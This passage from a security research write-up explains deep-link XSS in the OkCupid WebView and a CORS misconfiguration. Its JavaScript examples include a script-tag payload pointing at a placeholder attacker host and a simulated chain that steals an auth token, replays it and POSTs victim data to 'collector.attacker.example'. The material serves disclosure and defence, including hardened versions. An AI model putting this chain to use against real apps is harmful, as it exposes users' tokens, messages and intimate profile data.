Sensitive Data Exposure & Performing Actions on Behalf of the Victim

Up to this point, we were able to launch the OkCupid mobile application via a deep link containing malicious JavaScript code in the section parameter. The following screenshot shows the final XSS payload, which loads jQuery and then loads JavaScript code from the attacker's server (note that the upper part contains the XSS payload and the lower part is the same payload URL-encoded):

The following screenshot shows an HTTP GET request containing the final XSS payload (section parameter):

The server reflects the payload sent earlier in the section parameter, and the injected JavaScript code is executed in the context of the WebView.
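To make the reflection concrete, here is an added example (not OkCupid's code) of a simplified deep-link handler that renders a "section" query parameter into the markup shown in a WebView, once in the reflecting form described above and once hardened with an allowlist plus HTML escaping. The scheme, the sample deep link, the allowed section names and all function names are assumptions made for illustration; the attacker host in the sample link is a placeholder.

```javascript
// Added example, not code from the research or the app. Models a deep-link
// router that places the "section" parameter into WebView markup.
// Scheme, host, allowlist and function names are assumptions for illustration.

// Constructed deep link: a percent-encoded <script> tag in the section parameter,
// the same "payload vs URL-encoded payload" pairing the write-up describes.
const SAMPLE_DEEP_LINK =
  'okcupid://settings?section=' +
  encodeURIComponent('<script src="https://attacker.example/x.js"></script>');

// Parse the link as a URL router would. The WHATWG URL class accepts custom
// schemes and percent-decodes query values, so the raw <script> comes back.
function extractSection(deepLink) {
  return new URL(deepLink).searchParams.get('section');
}

// VULNERABLE: the decoded parameter is concatenated into HTML unchanged, so the
// encoded tag in the link becomes live script running in the WebView's context.
function renderSectionVulnerable(deepLink) {
  const section = extractSection(deepLink);
  return `<div id="section">${section}</div>`;
}

// HARDENED: accept only known section names, and escape anything that is
// rendered so untrusted input can never turn into markup.
const ALLOWED_SECTIONS = new Set(['profile', 'privacy', 'notifications']);

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

function renderSectionHardened(deepLink) {
  const section = extractSection(deepLink);
  if (section === null || !ALLOWED_SECTIONS.has(section)) {
    // Reject instead of reflecting; keep an escaped copy for logging only.
    return { ok: false, html: '', rejected: escapeHtml(section ?? '') };
  }
  return { ok: true, html: `<div id="section">${escapeHtml(section)}</div>` };
}

// Quick check a tester can run over rendered output.
function containsScript(html) {
  return /<script[\s>]/i.test(html);
}

console.log('vulnerable render executes script:',
  containsScript(renderSectionVulnerable(SAMPLE_DEEP_LINK)));
console.log('hardened render:', renderSectionHardened(SAMPLE_DEEP_LINK));
```

The allowlist is the important half: escaping alone would stop the markup, but a section name the app never defined should not reach the renderer at all, and rejecting it gives you a log line to alert on.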

As mentioned before, the final XSS payload loads a script file from the attacker's server. The loaded JavaScript code is used for data exfiltration and contains 3 functions:

  1. steal_token – Steals the user's authentication token, oauthAccessToken, and the user's id, userid. Sensitive user information (PII), such as email, is exfiltrated as well.
  2. steal_data – Steals the user's profile and private data: preferences, user attributes (e.g. answers filled in during registration), and more.
  3. send_data_to_attacker – Sends the data collected in functions 1 and 2 to the attacker's server.

steal_token function:

The function issues an API call to the server. The user's cookies are sent along with it because the XSS payload is executed in the context of the application's WebView.

The server responds with a large JSON containing the user's id and the authentication token as well:

steal_data function:

The function issues an HTTP request to an API endpoint.

Using the data exfiltrated in the steal_token function, the request is sent with the authentication token and the user's id.

The server responds with all the information about the victim's profile, including email, sexual orientation, height, family status, etc.

send_data_to_attacker function:

The function issues a POST request to the attacker's server containing all the information retrieved in the previous function calls (steal_token and steal_data).

The following screenshot shows an HTTP POST request sent to the attacker's server. The request body contains all of the victim's sensitive information:
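As an added example (not the research payload), the three-step chain above modelled against a constructed in-memory API so it runs offline. It shows why HttpOnly does not stop this flow: the script never reads a cookie, the WebView attaches it to the first request, and the token that comes back in the JSON is what authorises the second request. The host names, the /bootstrap and /profile/ paths, the profile fields and the collector path are assumptions; oauthAccessToken and userid are the field names the write-up reports.

```javascript
// Added example, not the research payload. Synchronous model of
// steal_token -> steal_data -> send_data_to_attacker against a fake server.
// Hosts, paths and profile fields are assumptions for illustration.

const API_HOST = 'api.app.test';                    // assumed stand-in for the API server
const ATTACKER_HOST = 'collector.attacker.example'; // assumed attacker host

// Constructed server. The session cookie is added by the WebView when the
// request opts into credentials; script code never touches document.cookie.
function makeFakeTransport(wire) {
  return function transport(url, { method = 'GET', headers = {}, body, credentials } = {}) {
    wire.push({ method, url, headers, body });
    const { host, pathname } = new URL(url);
    if (host === API_HOST && pathname === '/bootstrap') {
      if (credentials !== 'include') return { status: 401, json: {} };
      return {
        status: 200,
        json: { userid: '12345', oauthAccessToken: 'tok-abc', email: 'victim@example.test' },
      };
    }
    if (host === API_HOST && pathname === '/profile/12345') {
      if (headers.Authorization !== 'Bearer tok-abc') return { status: 401, json: {} };
      return { status: 200, json: { orientation: 'straight', height: 180 } };
    }
    if (host === ATTACKER_HOST && method === 'POST') return { status: 200, json: {} };
    return { status: 404, json: {} };
  };
}

// 1. steal_token: cookie-authenticated call; token, id and email come back as JSON.
function stealToken(transport) {
  const r = transport(`https://${API_HOST}/bootstrap`, { credentials: 'include' });
  if (r.status !== 200) throw new Error('bootstrap call failed');
  const { oauthAccessToken, userid, email } = r.json;
  return { oauthAccessToken, userid, email };
}

// 2. steal_data: the exfiltrated token is replayed as a Bearer credential.
function stealData(transport, { oauthAccessToken, userid }) {
  const r = transport(`https://${API_HOST}/profile/${encodeURIComponent(userid)}`, {
    headers: { Authorization: `Bearer ${oauthAccessToken}` },
  });
  if (r.status !== 200) throw new Error('profile call failed');
  return r.json;
}

// 3. send_data_to_attacker: one POST carrying everything collected so far.
function sendDataToAttacker(transport, payload) {
  return transport(`https://${ATTACKER_HOST}/collect`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(payload),
  }).status;
}

function runChain(transport) {
  const creds = stealToken(transport);
  const profile = stealData(transport, creds);
  const status = sendDataToAttacker(transport, { ...creds, profile });
  return { status, creds, profile };
}

// What a defender sees on the wire: two calls to the API and a POST to a host
// the app never otherwise talks to. That last request is the detection hook.
const wire = [];
const result = runChain(makeFakeTransport(wire));
console.log(wire.map((w) => `${w.method} ${w.url}`), result.status);
```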

Performing actions on behalf of the victim is also possible thanks to the exfiltration of the victim's authentication token and user id. This information can be used in the malicious JavaScript code (in the same way it is used in the steal_data function).

An attacker can perform actions such as sending messages and changing profile data thanks to the information exfiltrated in the steal_token function:

  1. The authentication token, oauthAccessToken, is used in the Authorization header (Bearer value).
  2. The user id, userId, is added as required.

Note: An attacker cannot perform a full account takeover because the cookies are protected with HttpOnly.

Web Platform Vulnerabilities: Misconfigured Cross-Origin Resource Sharing Policy Leads to Sensitive Data Exposure

During the research, we found that the CORS policy of the API server api.OkCupid.com is not configured properly: any origin can send requests to the server and read its responses. The following is a request sent to the API server from an attacker-controlled origin:

The server does not properly validate the origin and responds with the requested data. Moreover, the server response contains an Access-Control-Allow-Origin header echoing the requesting origin, together with Access-Control-Allow-Credentials: true:

From this point on, we found that we could send requests to the API server from our own domain without being blocked by the CORS policy.

As soon as a victim who is authenticated on the OkCupid application browses to the attacker's web application, an HTTP GET request carrying the victim's cookies is sent to the API server. The server's response contains a large JSON with the victim's authentication token and the victim's user_id.
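The following added example (not OkCupid's code) models the two CORS behaviours discussed above, an origin-reflecting policy and an allowlist policy, together with the check a tester applies to a captured response. It also covers the case the write-up does not need to mention: a wildcard Access-Control-Allow-Origin with credentials is refused by browsers, so the dangerous pattern is specifically an echoed origin plus Access-Control-Allow-Credentials: true. The origins, the allowlist and the sample request headers are assumptions for illustration; header names are handled in lowercase.

```javascript
// Added example, not code from the research or the API server. Models an
// origin-reflecting CORS policy next to an allowlist policy, plus a checker
// for captured responses. Origins and allowlist are assumptions.

const TRUSTED_ORIGINS = new Set(['https://www.example-app.test']); // assumed

// VULNERABLE: whatever Origin the browser sends is echoed back, with
// credentials allowed. Because the echoed value is a concrete origin rather
// than "*", browsers honour the credentials flag and let the page read the body.
function corsHeadersVulnerable(requestHeaders) {
  const origin = requestHeaders['origin'];
  if (!origin) return {};
  return {
    'access-control-allow-origin': origin,
    'access-control-allow-credentials': 'true',
  };
}

// HARDENED: only allowlisted origins get an allow-origin header, and the
// response carries Vary: Origin so a cache never serves one origin's answer
// to another.
function corsHeadersHardened(requestHeaders) {
  const origin = requestHeaders['origin'];
  if (!origin || !TRUSTED_ORIGINS.has(origin)) return { vary: 'Origin' };
  return {
    'access-control-allow-origin': origin,
    'access-control-allow-credentials': 'true',
    vary: 'Origin',
  };
}

// Checker for a captured request/response pair (lowercase header names).
// Returns true when the requesting origin would be able to issue
// fetch(url, { credentials: 'include' }) and read the JSON. The result only
// means "exploitable" when the origin was chosen by the tester.
function allowsCredentialedRead(requestHeaders, responseHeaders) {
  const origin = requestHeaders['origin'];
  const acao = responseHeaders['access-control-allow-origin'];
  const acac = responseHeaders['access-control-allow-credentials'];
  // "*" never matches a concrete origin here; browsers reject "*" with credentials.
  return origin !== undefined && acao === origin && acac === 'true';
}

// Constructed sample: the request an attacker page causes the victim's
// browser to send. The cookie is attached by the browser, not by the page.
const ATTACKER_REQUEST = {
  origin: 'https://attacker.example',
  cookie: 'session=<victim session cookie>',
};

function probe(handler, requestHeaders = ATTACKER_REQUEST) {
  return allowsCredentialedRead(requestHeaders, handler(requestHeaders));
}

console.log('reflecting policy readable from attacker origin:', probe(corsHeadersVulnerable));
console.log('allowlist policy readable from attacker origin:', probe(corsHeadersHardened));
```

When testing a live API, run the same check with an Origin you control, an Origin that is a subdomain or look-alike of the real site, and a null Origin; a policy that passes only the first case is still worth reporting.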

We were also able to find more useful information in the response of the bootstrap API endpoint: a list of sensitive API endpoints exposed by the API server:

The following screenshot shows sensitive PII data exfiltration from the /profile/ API endpoint, using the victim's user_id and access_token:

The following screenshot shows exfiltration of the victim's messages from the /1/messages/ API endpoint, using the victim's user_id and access_token:

Conclusion

The world of online dating apps has developed rapidly over the years, and has matured to where it is today with the shift to a digital world, particularly in the past 6 months since the outbreak of Coronavirus around the globe. "New normal" habits such as "social distancing" have forced the dating world to rely entirely on digital tools.

The research presented here shows the risks associated with one of the longest-established and most popular apps in its sector. The dire need for privacy and data security becomes even more essential when so much personal and intimate information is stored, managed and analyzed within an application. The app and platform were created to bring people together, but of course where people go, criminals will follow, looking for easy pickings.